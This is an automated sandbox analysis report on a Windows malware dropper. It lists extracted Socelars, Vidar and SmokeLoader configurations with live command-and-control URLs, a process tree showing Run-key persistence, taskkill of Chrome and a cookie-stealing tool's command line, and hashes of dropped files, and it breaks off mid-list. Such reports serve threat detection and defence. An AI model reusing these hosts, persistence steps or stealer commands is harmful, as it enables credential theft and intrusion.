Analysis
- max time kernel: 156s
- max time network: 173s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 22-02-2022 07:59
- Static task: static1
- Behavioral task: behavioral1
- Sample: 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
- Resource: win7-en-20211208
General
- Target: 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
- Size: 3.6MB
- MD5: dd50ef8e8e983f27154ab17911100b42
- SHA1: cdb02b08be4c5f882e68bff48badf50d62ef8f66
- SHA256: 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df
- SHA512: ad061f2f4fcd1fec086b04ee6aff7d7861c6102b086952d74f6077ee9ea43b889faa52e82edc28047cf79f80eab9d272daa537e927fe3c6182a69cdfc63bcc34
Malware Config
- Extracted: socelars
  http://www.iyiqian.com/
  http://www.xxhufdc.top/
  http://www.uefhkice.xyz/
  http://www.wygexde.xyz/
- Extracted: vidar
  38.7
  890
  https://HAL9THapi.faceit.comramilgame
  profile_id: 890
- Extracted: smokeloader
  2020
  http://khaleelahmed.com/upload/
  http://twvickiassociation.com/upload/
  http://www20833.com/upload/
  http://cocinasintonterias.com/upload/
  http://masaofukunaga.com/upload/
  http://gnckids.com/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Socelars Payload (2 IoCs)
  Processes (resource | yara_rule):
    C:\Users\Admin\AppData\Local\Temp\agdsk.exe | family_socelars
    C:\Users\Admin\AppData\Local\Temp\agdsk.exe | family_socelars
- Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
  Processes (description | pid | process | target process):
    PID 5104 created 4708 | 5104 | WerFault.exe | rundll32.exe
    PID 2128 created 4752 | 2128 | WerFault.exe | File.exe
- Vidar Stealer (2 IoCs)
  Processes (resource | yara_rule):
    behavioral2/memory/4752-168-0x00000000024D0000-0x0000000002567000-memory.dmp | family_vidar
    behavioral2/memory/4752-169-0x0000000000400000-0x000000000049A000-memory.dmp | family_vidar
- Executes dropped EXE (10 IoCs)
  Processes (pid | process):
    1164 | agdsk.exe
    2072 | jg2_2qua.exe
    4192 | KRSetp.exe
    2752 | wf-game.exe
    2464 | Files.exe
    3680 | pzyh.exe
    3648 | pub2.exe
    4752 | File.exe
    3520 | jfiag3g_gg.exe
    4468 | jfiag3g_gg.exe
- Processes (resource | yara_rule):
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | wf-game.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Files.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid | process):
    4708 | rundll32.exe
    3648 | pub2.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" | pzyh.exe
    Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
- Checks whether UAC is enabled
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg2_2qua.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc):
    41 | ip-api.com
- Drops file in Program Files directory (2 IoCs)
  Processes (description | ioc | process):
    File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\eb3deb83-e0d5-46a9-9c50-72a67882adb6.tmp | setup.exe
    File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129011108.pma | setup.exe
- Drops file in Windows directory (6 IoCs)
  Processes (description | ioc | process):
    File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | svchost.exe
    File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | svchost.exe
    File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | svchost.exe
    File opened for modification | C:\Windows\WindowsUpdate.log | svchost.exe
    File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe
    File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | svchost.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (2 IoCs)
  Processes (pid | pid_target | process | target process):
    5048 | 4708 | WerFault.exe | rundll32.exe
    1852 | 4752 | WerFault.exe | File.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
    Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
    Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
- Enumerates system info in registry (2 TTPs, 7 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Kills process with taskkill (1 IoCs)
  Processes (pid | process):
    5348 | taskkill.exe
- Modifies registry class (4 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
    Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes (pid | process):
    3648 | pub2.exe
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  Processes (pid | process):
    1864 | msedge.exe
    1864 | msedge.exe
    1864 | msedge.exe
    1864 | msedge.exe
    1864 | msedge.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of FindShellTrayWindow (7 IoCs)
  Processes (pid | process):
    1864 | msedge.exe
    2920
    1864 | msedge.exe
    2920
    2920
    2920
    2920
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes (pid | process):
    2752 | wf-game.exe
    2752 | wf-game.exe
- Suspicious use of UnmapMainImage (1 IoCs)
  Processes (pid | process):
    2920
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes (tree depth in brackets; child processes are indented under their parent)
- [1] C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\agdsk.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\agdsk.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe
      command line: cmd.exe /c taskkill /f /im chrome.exe
      - [4] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im chrome.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
  - [2] C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffea46446f8,0x7ffea4644708,0x7ffea4644718
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3264 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:1
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5528 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      - Drops file in Program Files directory
      - [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x208,0x22c,0x7ff683555460,0x7ff683555470,0x7ff683555480
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2412 /prefetch:2
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:8
  - [2] C:\Users\Admin\AppData\Local\Temp\wf-game.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\wf-game.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\rundll32.exe
      command line: "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
      - Loads dropped DLL
      - [4] C:\Windows\SysWOW64\WerFault.exe
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 600
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\Files.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
      - Executes dropped EXE
      - [4] C:\Windows\SysWOW64\WerFault.exe
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 996
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
    - [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1jF6h7
      - [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffea46446f8,0x7ffea4644708,0x7ffea4644718
  - [2] C:\Users\Admin\AppData\Local\Temp\pzyh.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
    - [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
  - [2] C:\Users\Admin\AppData\Local\Temp\pub2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
- [1] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory
- [1] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4752 -ip 4752
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [1] C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- [1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
de477c625e69a07beb047419ff93d06a
SHA1e843c5967dffa6ebd94c3083da5a14b60233de04
SHA256ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552
SHA512ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
de477c625e69a07beb047419ff93d06a
SHA1e843c5967dffa6ebd94c3083da5a14b60233de04
SHA256ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552
SHA512ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoMD5
e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Temp\CC4F.tmpMD5
4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1e16506f662dc92023bf82def1d621497c8ab5890
SHA256767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA5129da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219
-
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
979da759d9b79556889c6e6b99472300
SHA1
4e946769591ad513b252868958b9312ea7d85fcd
SHA256
64eb769c9f9df0f729ae2cf40a825f9527dfdf3c200b7599e0e2baefbe4bbca6
SHA512
d5f9d16a427e6cf5edd504d49b285039e6aac2bd96d1e9d6af08d06e22791d71416ba94b6a4cc3cebe04589f6c1ec1ff07125b40063f32f182c07c0cd72f7a9d
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
612730ae4c4a79876407a49a6b3a5aff
SHA1
ba5eca06192b70a25c22693cbd8835f197c1f4d1
SHA256
050a7738498b315438447ee86f51dc6319b35e7546dd3f7a4dcea7d7c4ab9b3e
SHA512
65f2e9dbfee3781e3fd97325d92058c22d5e9655df4f085811ccee8d26589c4644e6b40abbe0c1733ca47c55dfabacead91da9a564be8eee2d68b0f241acbae8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
MD5
8227b82d4a4a5757f752cfcb0ddae28e
SHA1
101e6f411c232b5f1e03d6ed2c1f8fcdc4909a13
SHA256
ab671264bcd07683a5b204b143968f03cbbf6318220faadad6d905ea1a748ea3
SHA512
ee3b0486a0dd87099237c795c4cb7cd4632dc5ad78c325197a9f8d042411216dd1bdd53e5f00bf745bd3b0b1f9fe1359e5760520b9e8166057d7a5b49b0f6817
-
C:\Users\Admin\AppData\Local\Temp\agdsk.exe
MD5
9531769e4efd084dd7f81f20dde745c5
SHA1
43e7415d5f5f0489363909fe63078a240edee012
SHA256
964d16e47507956196b61e3c302dee27ccc3cf42b5640afb93da3bd359bd9c66
SHA512
271cad1f03f487d4ab175d356fbcbe4227bd1f4aea7f9d5813dfa9d3bb747eb11565520e3d216c976d5075b5805c60238cf0cd0228267bb7b4126b161f3cfd0f
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
48bed3304e043907d99a7accfaa60f55
SHA1
1679826fd455ca27f582cfbd1b08e44e7eac0728
SHA256
391c0b7e198cee80dbf52840840cbe4d5ddfa1993007e465b4286f7ff7124a53
SHA512
38da18cde7cf4895712d5c15f3fca7aab643e90ef82cf308128acf1bafbaf929993a40fc104e83e01d48af008722c3075bf59f190c17b44a0b77cff852abe3a1
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0
SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680
-
C:\Users\Admin\AppData\Local\Temp\install.dat
MD5
83df536f22197802c67688aec85a63a8
SHA1
e804152d946fd5dcb51bacbf192744b7bf85d71f
SHA256
e3c5591919b3baa85a4b38eb02b605d4c0e51634b5c9385863a9672e87a711a4
SHA512
1a862072d473e7820ecf04d0404955b79df4187a9278eccd214f9fd635b15c466a77846e306b05a7e2143c7ea272289867dc8c77b5a4fd3f6752398934328dda
-
C:\Users\Admin\AppData\Local\Temp\install.dll
MD5
b29f18a79fee5bd89a7ddf3b4be8aa23
SHA1
0396814e95dd6410e16f8dd0131ec492718b88da
SHA256
9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e
SHA512
f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77
SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256
